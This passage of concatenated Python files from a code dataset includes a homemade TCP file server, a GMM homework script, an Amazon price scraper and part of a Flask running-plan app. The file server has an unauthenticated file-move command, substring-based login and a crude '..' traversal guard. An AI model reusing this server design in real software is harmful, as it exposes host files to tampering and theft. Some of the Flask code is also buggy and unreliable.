proc.process_queries()\r\n\r\n","sub_path":"algorithms/data_structures/hash_chains_subm.py","file_name":"hash_chains_subm.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"349369484","text":"import socket\nimport calendar\nimport os.path\nimport time\nimport sys\nimport urllib\nimport shutil\nimport urllib.request\n\nhost = '0.0.0.0'\nport = 1337\nbacklog = 5\nbuffer = 1024\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((host,port))\ns.listen(backlog)\n\nf = open(\"users.txt\")\nusers = f.read()\ncombo = users.split(\"\\n\")\n\ndef DWNLOAD(filename):\n try:\n if os.path.isfile(\"public/\" + filename):\n filesize = os.path.getsize('public/' + filename)\n client.send(str.encode(str(filesize)))\n data2 = client.recv(1024)\n datas2 = (data2.decode(encoding='UTF-8'))\n sendfile = open('public/' + filename, 'rb')\n bytes_done = 0\n\n if \"ACK\" in datas2:\n if str(filesize) in datas2:\n try:\n while filesize:\n byte = sendfile.read(1024)\n client.send(byte)\n bytes_done = bytes_done + len(byte)\n if bytes_done == filesize or bytes_done > filesize:\n client.close()\n break\n finally:\n sendfile.close()\n else:\n client.send(str.encode(\"Did not send back exact file size. 
Will not download.\\n\"))\n else:\n client.send(str.encode(\"ACK NOT RECV\\n\"))\n else:\n client.send(str.encode(\"This file does not exist.\\n\"))\n client.close()\n except:\n print(\"Unexpected error:\", sys.exc_info())\n client.close()\n sendfile.close()\n\ndef WRTFILE(filename, size):\n try:\n done = 0\n size = int(size)\n f = open('public/' + filename + \".temp\", 'a+b',)\n while (size != done):\n ls = client.recv(1024)\n f.write(ls)\n done = done + len(ls)\n if (size == done):\n f.close()\n shutil.copy('public/' + filename + '.temp', 'public/' + filename)\n os.remove(\"public/\" + filename + \".temp\")\n break\n except:\n print(\"Unexpected error:\", sys.exc_info())\n if os.path.isfile(\"public/\" + filename + \".temp\"):\n os.remove(\"public/\" + filename + \".temp\")\n\ndef MOVE():\n\n values = datas.split()\n original = values[1]\n new = values[2]\n print('/public/' + original)\n print('/public/' + new)\n\n shutil.copy(original, new)\n os.remove(original)\n\n client.send(str.encode(\"Moved \" + original + \" to \" + new))\n client.close()\n\n\ndef GET():\n split_com_get = datas.split()\n file = split_com_get[1]\n if os.path.isfile(\"public/\" + file):\n with open(\"public/\" + file) as f:\n for line in f:\n line_b = str.encode(line)\n client.send(line_b)\n else:\n rep = str.encode('File public/' + file + ' does not exist on this server.')\n client.send(rep)\n\ndef SNDTXT():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n\n split_com_get = datas.split()\n file = split_com_get[1]\n\n if os.path.isfile(\"public/\" + file):\n os.remove(\"public/\" + file)\n\n client.send(str.encode(\"Done writing to public/\" + file))\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef GURL():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n split_com_get = datas.split()\n filen = split_com_get[1]\n url = split_com_get[2]\n\n if os.path.isfile(\"public/\" + filen):\n client.send(str.encode(\"File already exists!\"))\n\n else:\n mess = str.encode(\"The server is now dowloading your file...\")\n client.send(mess)\n\n f = urllib.request.urlopen(url).read()\n target = open(\"public/\" + filen, 'a')\n target.write(str(f))\n target.close()\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef MKDR():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n\n split_com_get = datas.split()\n directory = split_com_get[1]\n\n if not os.path.exists(\"public/\" + directory):\n os.makedirs(\"public/\" + directory)\n target = open(\"public/\" + directory + \"/aaa.a\", 'a')\n content = \"aaa\"\n target.write(content)\n target.close()\n client.send(str.encode(\"Directory created!\"))\n else:\n client.send(str.encode(\"Directory already exists!\"))\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef DEL():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n split_com_get = datas.split()\n file = split_com_get[1]\n\n if os.path.isfile(\"public/\" + file):\n os.remove(\"public/\" + file)\n client.send(str.encode(\"File removed!\"))\n else:\n client.send(str.encode(\"This file does not exist.\"))\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef LIST():\n try:\n split_com_get = datas.split(\"///\")\n if split_com_get[1] == \"LIST\":\n dst = \"LIST\"\n else:\n dst_b4 = 
split_com_get[1]\n dst_b3 = dst_b4.split()\n dst = dst_b3[1]\n #print(dst)\n if dst == \"LIST\" or dst == \"LIST public\" or dst == \"LIST public/\":\n\n listing = os.listdir(\"public/\")\n count = 0\n #print(listing[count])\n for f in listing:\n cur_fil = listing[count]\n client.send(str.encode(cur_fil + \"\\n\"))\n count = count + 1\n else:\n listing = os.listdir(\"public/\" + dst)\n count = 0\n #print(listing[count])\n for f in listing:\n cur_fil = listing[count]\n client.send(str.encode(cur_fil + \"\\n\"))\n count = count + 1\n\n\n except FileNotFoundError:\n client.send(str.encode(\"Folder does not exist.\"))\n client.close()\n except NotADirectoryError:\n client.send(str.encode(\"This is a file, not a directory.\"))\n client.close()\n except:\n print(\"Generic Error Occoured during LIST.\")\n\ndef TIME():\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(epoch))\n print(current_time)\n client.send(str.encode(str(current_time)))\n\ndef HELP():\n help = \"Commands: GET, SNDTXT, GURL, MKDR, DEL, LIST, TIME\"\n client.send(str.encode(help))\n\nwhile 1:\n\n try:\n\n epoch = calendar.timegm(time.gmtime())\n\n client, address = s.accept()\n data = client.recv(1024)\n datas = (data.decode(encoding='UTF-8'))\n print(str(address))\n #print(\"Connection from: \" + str(address) + \" | Command: \" + datas)\n\n # Log the User\n target = open(\"logs/\" + \"log.txt\", 'a')\n content = address[0] + \" | \" + datas + \" | \" + str(epoch) + \"\\n\"\n target.write(content)\n target.close()\n\n if \"..\" in datas:\n nope = str.encode(\"I don't think so...\")\n client.send(nope)\n client.close()\n\n elif \"&&&&&ACK\" in datas:\n\n datac = datas.split(\"###\")\n datad = datas.split(\"|||\")\n filename = datad[1]\n size_file = datac[1]\n print(filename)\n print(size_file)\n\n WRTFILE(filename, size_file)\n print(\"did it get here?\")\n\n elif \"DWNLOAD\" in datas:\n\n dataX = datas.split(\"|||\")\n DWNLOAD(dataX[1])\n\n elif \"GET\" in datas:\n GET()\n\n elif \"SNDTXT\" in datas:\n SNDTXT()\n\n elif \"GURL\" in datas:\n GURL()\n\n elif \"MKDR\" in datas:\n MKDR()\n\n elif \"DEL\" in datas:\n DEL()\n\n elif \"MOVE\" in datas:\n MOVE()\n\n elif \"LIST\" in datas:\n LIST()\n\n elif \"TIME\" in datas:\n TIME()\n\n elif \"HELP\" in datas:\n HELP()\n\n elif \"MATRIX\" in datas:\n client.send(str.encode(\"Follow the white rabbit...\"))\n\n else:\n rep = str.encode(\"I don't understand the commmand: \" + datas)\n client.send(rep)\n\n except:\n print(\"Unexpected error:\", sys.exc_info())\n client.close()\n\n finally:\n client.close()\n","sub_path":"server/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"419779616","text":"from Store import Store\n\nclass MemoryStore(Store):\n def __init__(self):\n Store.__init__(self)\n self.database = {}\n\n def store_record(self, table, record):\n if table not in self.database:\n self.database[table] = {}\n\n db = self.database[table]\n pk = self.get_primary_key_fields(table)\n pk_values = (record[f] for f in pk)\n db[pk_values] = record\n\n def get_records(self, table_name, search=None, **kwargs):\n if kwargs:\n if search is None:\n search = kwargs\n else:\n search.update(kwargs)\n\n if table_name not in self.database:\n self.database[table_name] = {}\n\n db = self.database[table_name]\n records = []\n if search is None:\n for record in db.values():\n records.append(record)\n else:\n for record in db.values():\n found = True\n for k, v 
in search.iteritems():\n if record[k] != v:\n found = False\n break\n if found:\n records.append(record)\n\n return records\n\nif __name__ == '__main__':\n import pprint\n\n table_def = {\n 'name': \"settings\",\n \"fields\": [\n\n {'name': 'key', 'type': 'char', 'length': 20},\n {'name': 'value', 'type': 'char', 'length': 1000}\n ],\n 'primary_key': 'key'\n }\n\n store = MemoryStore()\n store.register_table(table_def)\n print(\"PK: %s\" % store.get_primary_key_fields('settings'))\n print(\"fields: %s\" % store.get_all_field_names('settings'))\n print(\"definition:\")\n pprint.pprint(store.get_definition('settings'))\n\n store.store_record('settings', {'key': 'test', 'value': 'aap'})\n store.store_record('settings', {'key': 'other', 'value': 'mies'})\n\n print(store.get_records('settings'))\n print(store.get_records('settings', {'key': 'other'}))\n print(store.get_records('settings', key='test'))\n","sub_path":"scratch/MemoryStore.py","file_name":"MemoryStore.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"608539847","text":"# # Gaussian Mixture Models\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utils\nfrom scipy.stats import multivariate_normal\nfrom gmm import GaussianMixtureModel\nfrom tabulate import tabulate\n\n\ndef plot_contour_gaussian(ax, mean, covariance, eps=1e-2):\n \"\"\" Plot the contour of a 2d Gaussian distribution with given mean and \n covariance matrix\n\n Args:\n ax (matplotlib.axes.Axes):\n Subplot used to plot the contour\n mean (numpy.array):\n Mean of the gaussian distribution\n covariance (numpy.array):\n Covariance matrix of the distribution\n eps:\n The cut off to draw the contour plot. The higher the value, \n the smaller the contour plot.\n\n Returns:\n None\n\n \"\"\"\n x1_range = np.linspace(-6, 8, 100)\n x2_range = np.linspace(-10, 8, 100)\n X1, X2 = np.meshgrid(x1_range, x2_range, indexing='ij')\n Z = np.concatenate((X1.flatten()[:, np.newaxis], X2.flatten()[:, np.newaxis]), axis=1)\n P = multivariate_normal.pdf(Z, mean, covariance)\n P[P < eps] = 0\n P = P.reshape((len(x1_range), len(x2_range)))\n ax.contour(x1_range, x2_range, P.T, colors='black', alpha=0.2)\n\n\ndef plot_gmm_model(ax, learned_model, test_data, percent):\n \"\"\" Plot the learned GMM and its associated gaussian distribution\n against the test data\n\n Args:\n ax (matplotlib.axes.Axes):\n Subplot used to plot the contour\n\n learned_model (GaussianMixtureModel):\n A trained GMM\n \n test_data (numpy.float):\n The testing data\n\n percent (float):\n The percentage of training data, used to label the subplot\n\n Returns:\n None\n\n \"\"\"\n for k in range(learned_model.K):\n plot_contour_gaussian(ax, learned_model.mus[k, :], learned_model.covariances[k, :, :])\n ax.scatter(test_data[:, 0], test_data[:, 1], alpha=0.5)\n ax.scatter(learned_model.mus[:, 0], learned_model.mus[:, 1], c=\"r\")\n ax.set_ylim(-10, 8)\n ax.set_xlim(-6, 8)\n ax.set_title(f\"{percent}%\")\n\n\ndef plot_multiple_contour_plots(learned_models):\n \"\"\" Plot multiple learned GMMs\n\n Arg:\n learned_models (list):\n A list of learned models that were trained on 10%,\n 20%, 30%, ..., 100% of training data\n \n Returns:\n fig:\n The figure handle which you can use to save the figure\n\n Example usage:\n >>> learned_models = ... 
# A list of trained GMMs trained on increasing data\n >>> fig = plot_multiple_contour_plots(learned_models)\n >>> fig.savefig(\"4(a)(ii).png)\n\n \"\"\"\n fig, axes = plt.subplots(4, 3, figsize=(14, 14))\n\n axes = axes.flatten()\n percentage_data = np.arange(10, 101, 10)\n X_test_all = utils.load_data_from_txt_file(\"P3/X_test.txt\")\n for i, learned_model in enumerate(learned_models):\n plot_gmm_model(axes[i], learned_model, X_test_all, percentage_data[i])\n\n axes[-1].axis('off')\n axes[-2].axis('off')\n return fig\n\n\n################################################\n# Problem 3a\n################################################\nprint('-----------------------------------------------------------------------')\nprint('Generate learning curve (K = 3)...')\n# Container for all models\nlearned_models = []\n\n# Container to store log-likelihoods\nlog_likelihoods = np.zeros([10, 2])\n\n# Load training, testing data\nx_train = utils.load_data_from_txt_file(\"P3/X_train.txt\")\nx_test = utils.load_data_from_txt_file(\"P3/X_test.txt\")\nN, d = x_train.shape\n\n# Initialize target number of Gaussians and training partitions\nK = 3\nperms = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\n# Initialize mixing coefficients\nmix_coeff = np.zeros((K,))\nmix_coeff[:] = 1 / K\n\n# Initialize covariance matrices\ncovar = np.zeros((K, d, d))\ncovar[:] = np.eye(d)\n\ntrain_l = None\ntest_l = None\nit = None\n# Loop through all permutations of training data\nfor frac, perm in enumerate(perms):\n # Load training data from current permutation\n x_train_perm = utils.load_data_from_txt_file(\"P3/TrainSubsets/X_train_\" + str(perm) + \"%.txt\")\n\n # Load mean initializations\n mu = utils.load_data_from_txt_file(\"P3/MeanInitialization/Part_a/mu_\" + str(perm) + \"%.txt\")\n\n # Instantiate Gaussian mixture model object\n gmm_mdl = GaussianMixtureModel(K, mu, covar, mix_coeff)\n\n # Learn gmm model on current permutation of training data\n gmm_mdl.fit(x_train_perm)\n\n # Store current model\n learned_models.append(gmm_mdl)\n\n # Train and test log-likelihood\n train_log = gmm_mdl.compute_llh(x_train_perm)\n test_log = gmm_mdl.compute_llh(x_test)\n\n # Save log-likelihood values for permutation 100\n if perm == 100:\n train_l = train_log\n test_l = test_log\n it = gmm_mdl.it\n print(\"For permutation \" + str(perm) + \", iteration \" + str(gmm_mdl.it) +\n \", normalized training log-likelihood is: \" + str(round(train_log, 4)) +\n \", normalized test log-likelihood is: \" + str(round(test_log, 4)))\n\n # Save log-likelihoods\n log_likelihoods[frac, 0] = train_log\n log_likelihoods[frac, 1] = test_log\n\n# Generate contour plot\nfig = plot_multiple_contour_plots(learned_models)\nfig.savefig(\"Plots/3(a)(ii).png\")\n\nprint(\"\\nParameters of final model:\")\n# Generate table of data for 100% permutation\nrows, cols = (5, 2)\nnames = ['K', 'Permutation', 'Iterations', 'Normalized training log-likelihood', 'Normalized test log-likelihood']\nvalues = [str(K), str(100) + '%', str(it), str(round(train_l, 4)), str(round(test_l, 4))]\nfilename = 'Plots/3(a)(ii).txt'\nutils.tabulate_data(rows, cols, names, values, \"center\", \"num\", filename, 'w')\n\n# Generate table of means\nrows, cols = (3, 2)\nnames = ['Mean 1', 'Mean 2', 'Mean 3']\nvalues = [str(np.round(learned_models[9].mus[0], 4)),\n str(np.round(learned_models[9].mus[1], 4)),\n str(np.round(learned_models[9].mus[2], 4))]\nfilename = 'Plots/3(a)(ii)_means.txt'\nutils.tabulate_data(rows, cols, names, values, \"right\", \"str\", filename, 'w')\n\n# Generate table of 
covariances\nrows, cols = (3, 2)\nnames = ['Covariance 1', 'Covariance 2', 'Covariance 3']\nvalues = [str(np.round(learned_models[9].covariances[0], 4)),\n str(np.round(learned_models[9].covariances[1], 4)),\n str(np.round(learned_models[9].covariances[2], 4))]\nfilename = 'Plots/3(a)(ii)_covariances.txt'\nutils.tabulate_data(rows, cols, names, values, \"right\", \"str\", filename, 'w')\n\n# Generate table of mixing coefficients\nrows, cols = (3, 2)\nnames = ['Mixing coefficient 1', 'Mixing coefficient 2', 'Mixing coefficient 3']\nvalues = [str(np.round(learned_models[9].mixing_coeff[0], 4)),\n str(np.round(learned_models[9].mixing_coeff[1], 4)),\n str(np.round(learned_models[9].mixing_coeff[2], 4))]\nfilename = 'Plots/3(a)(ii)_mixing_coefficients.txt'\nutils.tabulate_data(rows, cols, names, values, \"right\", \"str\", filename, 'w')\nprint('-----------------------------------------------------------------------')\n\n# Plot Log-likelihoods\nfig, ax = plt.subplots()\nax.plot(np.linspace(10, 100, num=10), log_likelihoods[:, 0], marker='o', c='b', label='Training Log-Likelihood')\nax.plot(np.linspace(10, 100, num=10), log_likelihoods[:, 1], marker='o', c='r', label='Test Log-Likelihood')\nplt.title('GMM Learning Curve')\nplt.legend()\nplt.xlim(0, 110)\nax.set_xlabel('Training Partition (%)')\nax.set_ylabel('Normalized Log-Likelihood')\nfig.savefig(\"Plots/3(a)(i).png\")\nplt.show(block=False)\n################################################\n# Problem 3b\n################################################\nprint('Performing cross-validation...')\n\n# Target Gaussians\ngauss = [1, 2, 3, 4, 5]\n\n# Container to store log-likelihoods and cross validation log-likelihood\nlog_likelihoods = np.zeros([len(gauss), 2])\nlog_likelihoods_cross = np.zeros([5, len(gauss)])\n\n# Loop through all K values\nfor idx_K, K in enumerate(gauss):\n # Initialize mixing coefficients\n mix_coeff = np.zeros((K,))\n mix_coeff[:] = 1 / K\n\n # Initialize covariance matrices\n covar = np.zeros((K, d, d))\n covar[:] = np.eye(d)\n\n # Load mean initializations\n mu = utils.load_data_from_txt_file(\"P3/MeanInitialization/Part_b/mu_k_\" + str(K) + \".txt\")\n\n # Instantiate Gaussian mixture model object for current K value\n gmm_mdl = GaussianMixtureModel(K, mu, covar, mix_coeff)\n\n # Learn gmm model on full training data\n gmm_mdl.fit(x_train)\n\n # Train and test log-likelihood\n train_log = gmm_mdl.compute_llh(x_train)\n test_log = gmm_mdl.compute_llh(x_test)\n\n # Save log-likelihoods\n log_likelihoods[idx_K, 0] = train_log\n log_likelihoods[idx_K, 1] = test_log\n\n # Loop through all folds\n for idx_cross, fold in enumerate(gauss):\n # Load training/testing data from current fold\n x_train_fold = utils.load_data_from_txt_file(\"P3/CrossValidation/X_train_fold\" + str(fold) + \".txt\")\n x_test_fold = utils.load_data_from_txt_file(\"P3/CrossValidation/X_test_fold\" + str(fold) + \".txt\")\n\n # Learn gmm model on training fold\n gmm_mdl.fit(x_train_fold)\n\n # Test log-likelihood for respective fold\n test_fold_log = gmm_mdl.compute_llh(x_test_fold)\n\n # Save cross log-likelihoods\n log_likelihoods_cross[idx_cross, idx_K] = test_fold_log\n\n print(\"For K = \" + str(K) + \", normalized training log-likelihood is: \" + str(round(train_log, 4)) +\n \", normalized test log-likelihood is: \" + str(round(test_log, 4)) +\n \", average cross validation log-likelihood is: \" + str(round(np.average(log_likelihoods_cross[:, idx_K]), 4)))\n# Optimal K value\nk_chosen = gauss[np.argmax(np.average(log_likelihoods_cross, 
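# model selection: average the held-out log-likelihood over the 5 folds for each K, then take the K that maximizes it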
axis=0))]\nprint(\"Selected value of K is: \" + str(k_chosen))\n\n# Generate table\nrows, cols = (4, 2)\nnames = ['Selected value of K:', 'Average cross validation log-likelihood ',\n 'Normalized training log-likelihood', 'Normalized test log-likelihood']\nvalues = [str(k_chosen), str(round(np.max(np.average(log_likelihoods_cross, axis=0)), 4)),\n str(round(log_likelihoods[np.argmax(np.average(log_likelihoods_cross, axis=0)), 0], 4)),\n str(round(log_likelihoods[np.argmax(np.average(log_likelihoods_cross, axis=0)), 1], 4))]\nfilename = 'Plots/3(b).txt'\nutils.tabulate_data(rows, cols, names, values, \"center\", \"num\", filename, 'w')\nprint('-----------------------------------------------------------------------')\n\n# Plot Log-likelihoods\nfig, ax = plt.subplots()\nax.plot(gauss, log_likelihoods[:, 0], marker='o', c='b', label='Training Log-Likelihood')\nax.plot(gauss, log_likelihoods[:, 1], marker='o', c='r', label='Test Log-Likelihood')\nax.plot(gauss, np.average(log_likelihoods_cross, axis=0), marker='o', c='k',\n label='Cross-Validation Log-Likelihood')\nplt.title('GMM Learning Curve')\nplt.legend()\nplt.xticks(np.arange(1, 6))\nax.set_xlabel('No. Gaussians')\nax.set_ylabel('Normalized Log-Likelihood')\nfig.savefig(\"Plots/3(b).png\")\nplt.show(block=False)\n","sub_path":"PS4/ps4-kit/PS4-P3.py","file_name":"PS4-P3.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468619411","text":"import requests \nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\n\nURL = 'https://www.amazon.com/Apple-MacBook-16-Inch-16GB-Storage/dp/B081FV1Y57/ref=sr_1_3?crid=356Z7N430I8HA&keywords=macbook+pro&qid=1574195569&sprefix=mac%2Caps%2C158&sr=8-3'\n\nheaders = {\"User-Agent\": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'}\n \ndef checkPrice():\n page = requests.get(URL, headers=headers)\n soup = BeautifulSoup(page.content, 'html.parser')\n title = soup.find(id=\"productTitle\").get_text()\n \n price = soup.find(id=\"priceblock_ourprice\").get_text()\n converted_price = float(price[1:].replace(',', ''))\n if converted_price > 2500 :\n sendMail()\n\n print(title.strip())\n print(converted_price)\n\n\ndef sendMail():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n # Turn on the less secure app from google \n server.login('saliv4402@gmail.com', '')\n\n subject = 'Price Fell Down!'\n body = f'Check amazon Link: {URL}'\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n server.sendmail(\n 'saliv440@gmail.com',\n 'sali.vishwaraj@gmail.com',\n msg \n )\n\n print('Email has been sent!!!')\n server.quit()\n\nwhile True:\n checkPrice()\n time.sleep(60 * 60)","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"185554947","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom api import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'company', views.CompanyViewSet)\nrouter.register(r'people', views.PeopleViewSet)\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', 
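# rest_framework.urls supplies the login/logout views for DRF's browsable API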
include('rest_framework.urls', namespace='rest_framework')),\n path('commonfriends///',\n views.CommonFriendsView.as_view(), name='common_friends'),\n]\n","sub_path":"paranuara/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"179957757","text":"\"\"\"Training generator\"\"\"\n\nfrom jinja2 import StrictUndefined\n\nfrom flask import Flask, render_template, redirect, request, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom datetime import timedelta\nimport calculator\nfrom model import connect_to_db, db, User, Race, Pace\n\napp = Flask(__name__)\n\n#required for Flask session and the debug toolbar\napp.secret_key = \"ABC\"\n\n# so undefined variable in Jinga2 doesn't fail silently\n# app.jinja_env.undefined = StrictUndefined\nTRAINING_PLAN = [\n (0.60, \"Easy runs @ {easy} to meet mileage goals\"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\",\n \"Long run @ {easy}, distance: {0.162 * peakmileage} \"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\",\n \"Long run @ {easy}, distance: {0.162 * peakmileage} \"),\n (0.60, \"Easy runs @ {easy} to meet mileage goals\",\n \"Long run @ {easy}, distance: {0.162 * peakmileage} \"),\n (0.80, \"Long run @ {easy}, distance: {0.216 * peakmileage} \",\n \"Tempo - 20 minutes @ {tempo} broken into 2 x 10 minutes with 1 minutes rest\"),\n (0.80, \"Long run @ {easy}, distance: {0.216 * peakmileage} \",\n \"Tempo - 20 minutes @ {tempo} broken into 2 x 10 minutes with 1 minutes rest\"),\n (0.70, \"Two Easy runs @ {easy}, total distance: {0.189 * peakmileage}\",\n \"Tempo - 30 minutes @ {tempo} broken into 3 x 10 minutes with 1 minutes rest\"),\n (0.90, \"Long run @ {easy}, distance: {0.243 * peakmileage} \",\n \"Tempo - 30 minutes @ {tempo} broken into 3 x 10 minutes with 1 minutes rest\"),\n (0.90, \"Long run @ {easy}, distance: {0.243 * peakmileage} \",\n \"Tempo - 30 minutes @ {tempo} broken into 2 x 15 minutes with 1 minutes rest\"),\n (0.70, \"Marathon run for 12 miles @ {marathon}. Finish with 5 to 6 20-30 second strides with 1 minutes rest.\",\n \"Tempo - 30 minutes @ {tempo} broken into 2 x 15 minutes with 1 minutes rest\"),\n (1.0, \"Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. Easy ({easy}) for 60 minutes. Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. \",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (0.90, \"Marthon pace ({marathon}), for 15 miles.\",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (1.0, \"Long run @ {easy}, distance: {0.25 * peakmileage} \",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (0.80, \"Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. Easy ({easy}) for 60 minutes. Tempo 3 x 5 minutes @ {tempo}, with 1 minute rest. \",\n \"Tempo 2 x 10 minutes @ {tempo}, with 2 minute rest. Easy ({easy}) for 75 minutes.\"),\n (0.80, \"Marathon pace ({marathon}) for 12 miles.\",\n \"Easy pace ({easy}) for 2 miles. Tempo - 25 minutes @ {tempo} broken into 5 x 5 minutes with 1 minute rest\"),\n (0.60, \"Two Easy runs @ {easy}, total distance: {0.162 * peakmileage}\",\n \"Easy pace ({easy}) for 2 miles. 
Tempo - 25 minutes @ {tempo} broken into 5 x 5 minutes with 1 minute rest\"),\n]\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Homepage.\"\"\"\n\n return render_template(\"home.html\")\n\n\n # return render_template(\"home.html\", blah=blah)\n\n@app.route(\"/calculate-VDOT\", methods=[\"POST\"])\ndef create_table():\n hr = request.form.get(\"hours\")\n mm = request.form.get(\"minutes\")\n ss = request.form.get(\"seconds\")\n peak_mileage = float(request.form.get(\"mileage\"))\n units = request.form.get(\"units\")\n distance = float(request.form.get(\"distance\"))\n email = request.form.get(\"email\")\n\n # have function in calculator.py (with doctest) would it be clear to call .calculator.function()?\n time = float(mm) + (float(hr) * 60) + (float(ss) / 60)\n\n distance_in_meters = calculator.convert_distance_to_meters(distance, units)\n\n # should exist on Race class, remove VDOT variable\n # VDOT = calculator.user_VDOT(distance, units, time)\n # print VDOT\n # session[\"VDOT\"] = VDOT\n # -------TODO--------\n # send distance and time to races tabel under user email/id\n new_user = User(email=email, weekly_mileage=peak_mileage)\n db.session.add(new_user)\n db.session.commit()\n\n user_obj = User.query.filter(User.email == email).first()\n user_id = user_obj.user_id\n session[\"user_id\"] = user_id\n\n new_race = Race(user_id=session[\"user_id\"], distance=distance_in_meters, time=time)\n db.session.add(new_race)\n db.session.commit()\n\n session[\"VDOT\"] = new_race.VDOT()\n\n return render_template(\"generate-calendar.html\", VDOT=session[\"VDOT\"])\n\n\ndef gen_training_plan(easy, marathon, tempo, peak_mileage):\n \"\"\"Returns full training plan as [(fraction peak_mileage, [q1, q2])]\"\"\"\n\n training_plan = [\n # (fraction peak_mileage, [Q1,\n # Q2])\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\"]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\"]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\"]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\",\n \"Long run @ \" + easy + \", distance: \" + 0.162 * peak_mileage]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\",\n \"Long run @ \" + easy + \", distance: \" + 0.162 * peak_mileage]),\n (0.60, [\"Easy runs @ \" + easy + \", to meet mileage goals\",\n \"Long run @ \" + easy + \", distance: \" + 0.162 * peak_mileage]),\n (0.80, [\"Long run @ \" + easy + \", distance: \" + 0.216 * peak_mileage,\n \"Tempo - 20 minutes @ \" + tempo + \", broken into 2 x 10 minutes with 1 minutes rest\"]),\n (0.80, [\"Long run @ \" + easy + \", distance: \" + 0.216 * peak_mileage,\n \"Tempo - 20 minutes @ \" + tempo + \", broken into 2 x 10 minutes with 1 minutes rest\"]),\n (0.70, [\"Two Easy runs @ \" + easy + \", total distance:\" + 0.189 * peak_mileage,\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 3 x 10 minutes with 1 minutes rest\"]),\n (0.90, [\"Long run @ \" + easy + \", distance: \" + 0.243 * peak_mileage,\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 3 x 10 minutes with 1 minutes rest\"]),\n (0.90, [\"Long run @ \" + easy + \", distance: \" + 0.243 * peak_mileage,\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 2 x 15 minutes with 1 minutes rest\"]),\n (0.70, [\"Marathon run for 12 miles @ \" + marathon + \". Finish with 5 to 6 20-30 second strides with 1 minutes rest.\",\n \"Tempo - 30 minutes @ \" + tempo + \", broken into 2 x 15 minutes with 1 minutes rest\"]),\n (1.0, [\"Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest. 
